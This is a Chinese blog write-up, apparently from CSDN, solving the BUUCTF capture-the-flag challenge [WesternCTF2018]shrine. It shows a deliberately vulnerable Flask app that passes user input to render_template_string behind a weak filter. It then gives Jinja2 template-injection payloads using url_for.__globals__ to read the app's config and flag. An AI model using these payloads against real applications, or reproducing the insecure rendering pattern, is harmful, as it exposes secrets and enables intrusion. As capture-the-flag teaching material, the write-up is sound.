【BUUCTF】[WesternCTF2018]shrine

已于 2022-05-05 17:44:12 修改
阅读量630 收藏
点赞数 1
分类专栏: 模板注入 Flask 文章标签: flask python 后端
于 2022-05-05 17:41:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/124592928
版权

源码


import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

注意下面这句话,本app的config中可以看到FLAG

app.config['FLAG'] = os.environ.pop('FLAG')

很明显这段代码告诉了我们存在SSTI

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

有过滤,审计一下

		s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

replace将()替换为了空,后面一句话将黑名单的内容设置成了None,防止读取
在这里插入图片描述

方法是使用两个python自带的函数来进行注入

url_for

get_flashed_message()

/shrine/{{url_for.__globals__}}

在这里插入图片描述

/shrine/{{url_for.__globals__['current_app'].config}}

在这里插入图片描述
贴一下对理解题目有帮助的文章
python中下划线的作用
一些魔法函数

aoao今晚吃什么
关注
专栏目录
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2490
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
[WesternCTF2018]shrine 1(flask)
weixin_45577185的博客
09-10 294
非常完美的答案 分析源码 app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 上面这行代码把黑名单的东西遍历并设为空,例如:
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 273
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
[WesternCTF2018]shrine1
最新发布
kw741951的博客
08-05 263
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。存在flask-jinja2模板注入,并且存在黑名单过滤。发现了current_app()函数。查看其中的config得到flag。输入shrine/{{7*7}}打开题目,没什么头绪。查看页面源代码看一下。
web buuctf [WesternCTF2018]shrine
weixin_44214568的博客
04-04 1284
考点:模板注入(flask) 1.打开整理代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //显示代码 @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
WesternCTF2018_shrine
抒情诗
05-08 469
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923 0x00 开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码: import flask import os app = flask.Fla...
[WesternCTF2018]shrine
Sk1y的博客
06-17 250
考查点:SSTI模板注入,config配置文件,python的内置函数绕过黑名单
[WesternCTF2018] web题-shrine
BROTHERYY的博客
12-30 281
开题即送源码一份 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径 def shrine(shrine): def safe_j
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
Shrine.cr是一个专门为Crystal编程语言设计的文件附件处理库,灵感来源于Ruby社区中的 Shrine 框架。这个库提供了一套全面的解决方案,用于在Crystal应用程序中上传、存储和管理文件,同时也支持多种ORM适配器,使得...
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1572
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
BUUCTF [WesternCTF2018] shrine
Senimo
12-16 520
BUUCTF [WesternCTF2018] shrine 考点: Flask模版注入 url_for()和get_flashed_messages()函数绕过黑名单 __globals__、__dict__等变量含义 启动环境: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op
2010年全面解读Java教程:从基础知识到进阶应用
- Java编程环境设置,如1.2中的`Java䈝䀰Ⲵ⢩ Shrine`,讲述了JDK的安装和配置,以及Java开发环境的搭建。 - `Javaᓄ⭘࠶㊫`部分可能涉及类和对象的概念,以及面向对象编程的基石。 2. 进阶主题: - Java高级...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值